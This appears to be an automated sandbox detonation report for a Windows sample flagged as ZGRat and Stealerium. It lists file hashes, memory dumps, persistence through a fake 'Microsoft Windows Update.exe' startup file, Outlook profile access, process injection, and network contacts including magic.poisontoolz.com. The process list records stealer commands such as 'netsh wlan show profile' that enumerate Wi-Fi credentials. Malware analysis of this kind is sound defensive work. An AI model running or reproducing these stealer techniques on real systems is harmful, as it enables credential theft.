| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1868-6-0x0000000005A80000-0x0000000005AE6000-memory.dmp
memory/1868-17-0x0000000005DF0000-0x0000000006144000-memory.dmp
memory/1868-18-0x00000000061F0000-0x000000000620E000-memory.dmp
memory/1868-19-0x00000000062A0000-0x00000000062EC000-memory.dmp
memory/1868-20-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-23-0x0000000006780000-0x00000000067A2000-memory.dmp
memory/1868-24-0x00000000078C0000-0x0000000007E64000-memory.dmp
memory/1868-22-0x0000000006710000-0x000000000672A000-memory.dmp
memory/1868-21-0x0000000007270000-0x0000000007306000-memory.dmp
memory/1868-25-0x00000000084F0000-0x0000000008B6A000-memory.dmp
memory/4080-42-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/1868-44-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/4080-43-0x00000000057C0000-0x00000000057C6000-memory.dmp
memory/4080-41-0x0000000000FE0000-0x0000000000FF4000-memory.dmp
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | d9c253eaa73b4a33b91def3e863d644e |
| SHA1 | 626c26f275e691183fa48b68daf586e24960cc3e |
| SHA256 | 45474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654 |
| SHA512 | 5041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7 |
C:\Users\Admin\AppData\Roaming\RIB.pdf
| MD5 | ac6f4727f46bff3bd3f71550ae96c15f |
| SHA1 | 5966b42c1989bf6886c887a29480bd8a249476ee |
| SHA256 | 580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0 |
| SHA512 | 734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a |
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | 220f7a6283256dfda65a5879cb7d8afc |
| SHA1 | b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0 |
| SHA256 | bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37 |
| SHA512 | e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89 |
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
| MD5 | 0abd42634db4f4fb3bbbcaa066413d68 |
| SHA1 | 074f62ae3b24d775f09e98e81e857e6f1be05f3b |
| SHA256 | a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4 |
| SHA512 | 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2 |
memory/4080-46-0x0000000006360000-0x000000000648A000-memory.dmp
memory/4080-47-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-52-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-54-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-50-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-58-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-66-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-72-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-78-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-82-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-90-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-96-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-100-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-102-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-104-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-108-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-110-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-106-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-98-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-94-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-92-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-88-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-86-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-84-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-80-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-76-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-74-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-70-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-68-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-64-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-62-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-60-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-56-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-48-0x0000000006360000-0x0000000006483000-memory.dmp
memory/4080-992-0x00000000064B0000-0x00000000064B1000-memory.dmp
memory/4080-997-0x0000000006790000-0x00000000067DC000-memory.dmp
memory/4080-996-0x0000000006690000-0x0000000006750000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/556-1111-0x0000000000400000-0x000000000049C000-memory.dmp
memory/556-1115-0x0000000004E00000-0x0000000004EE8000-memory.dmp
memory/556-1114-0x0000000002980000-0x0000000002990000-memory.dmp
memory/556-1113-0x0000000071570000-0x0000000071D20000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4080-1112-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/556-3349-0x0000000004F80000-0x0000000004FD6000-memory.dmp
memory/556-3355-0x0000000005650000-0x00000000056A4000-memory.dmp
memory/556-3357-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/392-3358-0x000001AA3D780000-0x000001AA3D7A2000-memory.dmp
memory/392-3368-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 569124b0982577268dcbc9070e76fea0 |
| SHA1 | 149910730a6bc3a691d8df4dafb3cc12fd625496 |
| SHA256 | b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1 |
| SHA512 | fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95 |
memory/392-3369-0x000001AA229D0000-0x000001AA229E0000-memory.dmp
memory/392-3373-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
| MD5 | d9978a7bc703072527518ec65490fabb |
| SHA1 | 4cfc423812a29a857dd4d7db38bb648be228df30 |
| SHA256 | edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5 |
| SHA512 | c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222 |
memory/3152-3395-0x0000000005480000-0x0000000005490000-memory.dmp
memory/3152-3394-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3152-4328-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
memory/1592-4341-0x00000000057B0000-0x00000000057C0000-memory.dmp
memory/3152-4342-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1592-4340-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-6584-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-6585-0x0000000005240000-0x0000000005250000-memory.dmp
memory/1592-6586-0x0000000071660000-0x0000000071E10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2784-7257-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp
memory/2784-7278-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7299-0x0000016305F40000-0x0000016305F50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9b80cd7a712469a4c45fec564313d9eb |
| SHA1 | 6125c01bc10d204ca36ad1110afe714678655f2d |
| SHA256 | 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d |
| SHA512 | ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584 |
memory/1092-7534-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/2784-7533-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7535-0x0000016305F40000-0x0000016305F50000-memory.dmp
memory/2784-7537-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp
memory/1092-7544-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-7545-0x0000000005240000-0x0000000005250000-memory.dmp
memory/1708-7549-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/1092-7550-0x0000000071660000-0x0000000071E10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
| MD5 | f3ed43acd7d035e8c6035c7d65ec60bf |
| SHA1 | 679c01b051cbd42b740a05f0cd2807b16bae5aec |
| SHA256 | 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef |
| SHA512 | fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5 |
memory/3416-9795-0x0000000000140000-0x000000000015C000-memory.dmp
memory/1708-9796-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3416-9798-0x0000000004B10000-0x0000000004B20000-memory.dmp
memory/3416-9797-0x0000000071660000-0x0000000071E10000-memory.dmp
memory/3416-9799-0x00000000054E0000-0x0000000005616000-memory.dmp
memory/1708-10073-0x0000000005730000-0x0000000005740000-memory.dmp
memory/3416-10739-0x0000000004B00000-0x0000000004B01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
Analysis: behavioral24
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealerium
ZGRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2600 set thread context of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 40.126.32.133:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| SE | 192.229.221.95:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 138.91.171.81:80 | tcp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 208.95.112.1:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 149.154.167.220:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.135.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.167.249.196:443 | tcp | |
| SE | 192.229.221.95:80 | tcp | |
| N/A | 40.126.32.133:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 152.199.19.74:80 | tcp | |
| N/A | 52.140.118.28:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| N/A | 52.140.118.28:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 51.178.66.33:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 136.175.8.205:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 13.95.31.18:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.77.160.23:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| N/A | 162.159.135.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.17.179.34:80 | tcp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 192.98.74.40.in-addr.arpa | udp |
Files
memory/2600-1-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/2600-0-0x0000000000C50000-0x0000000000C5E000-memory.dmp
memory/2600-2-0x00000000056C0000-0x00000000056D0000-memory.dmp
memory/2600-3-0x0000000007200000-0x0000000007768000-memory.dmp
memory/2600-7-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-9-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-11-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-15-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-17-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-19-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-23-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-21-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-27-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-29-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-31-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-33-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-35-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-39-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-41-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-45-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-47-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-51-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-53-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-57-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-55-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-61-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-65-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-63-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-67-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-59-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-49-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-43-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-37-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-25-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-13-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-5-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-4-0x0000000007200000-0x0000000007763000-memory.dmp
memory/2600-936-0x0000000002F70000-0x0000000002F71000-memory.dmp
memory/2600-937-0x0000000008E30000-0x0000000009330000-memory.dmp
memory/2600-938-0x0000000006FD0000-0x000000000701C000-memory.dmp
memory/2600-939-0x0000000008190000-0x0000000008734000-memory.dmp
memory/2600-943-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/3764-945-0x0000000000400000-0x0000000000C0A000-memory.dmp
memory/3764-944-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/3764-947-0x0000000005260000-0x0000000005270000-memory.dmp
memory/3764-948-0x00000000052B0000-0x00000000052BA000-memory.dmp
memory/3764-946-0x00000000050C0000-0x0000000005152000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | a90e4f6bdd44a71e2246160693884539 |
| SHA1 | 940ebec474e0b4d87dc4f06f37a1d32d2315cf56 |
| SHA256 | b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4 |
| SHA512 | 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937 |
memory/5112-978-0x0000015A3DAD0000-0x0000015A3DC48000-memory.dmp
memory/4924-977-0x00000000008A0000-0x0000000000A32000-memory.dmp
memory/5112-980-0x00007FFADC100000-0x00007FFADCBC1000-memory.dmp
memory/4924-982-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/5112-983-0x0000015A58300000-0x0000015A58310000-memory.dmp
memory/3764-981-0x00000000745C0000-0x0000000074D70000-memory.dmp
memory/4924-979-0x00000000052E0000-0x0000000005346000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | aeb20a62dc5daec0e2f60165f9829b07 |
| SHA1 | fdafa16dfbd0d2d6a1f88add8db1120721edead2 |
| SHA256 | 08b11f91e2081d5ddf637d64784c4101ec65653d36299a7a22d9b457aae65a14 |
| SHA512 | 388f9d76bf79d9c5e53a4c994ff9853356b6a0f2c5ef7feae84813f1be1d3a2c09e1838a3286acf980e66a270028595191cd35dd6593a920a8862b3cf10e387b |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | dcf0f2f524e0e1d2752f64dc7fce8ea0 |
| SHA1 | 4cb2ae016e67f7fa88d9598313f6092fffc55559 |
| SHA256 | bf6796861138edc7e2eb7807fd388d91922408853c8dccb495aca889dd2e89b6 |
| SHA512 | fea9118e846801b82bb04c057624ab727c3f4116c7c194164da49f6541cfad65daa70e6a5c5dfc8f148e75ac5b96763b18dcf6a427c01fa4f8a7ab2b4aa51330 |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/5112-985-0x0000015A5A390000-0x0000015A5A3E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 6e0741d4586628386a6f1df47a03655e |
| SHA1 | 610950a24bb3c8b318130ffb98690ecba89c1018 |
| SHA256 | 65a5758d31c44e29e26a3444333ed585e13117daed14bff83e33df06ad9133f7 |
| SHA512 | 4a3e09b6f5c6a33a9c919477b488aef6d3bf18e793fa3ff82dd105015b95ba0cd4451e52fbcf5ff5c9e37bc138856aaa5d83a18529512fdc4794eaff9a401393 |
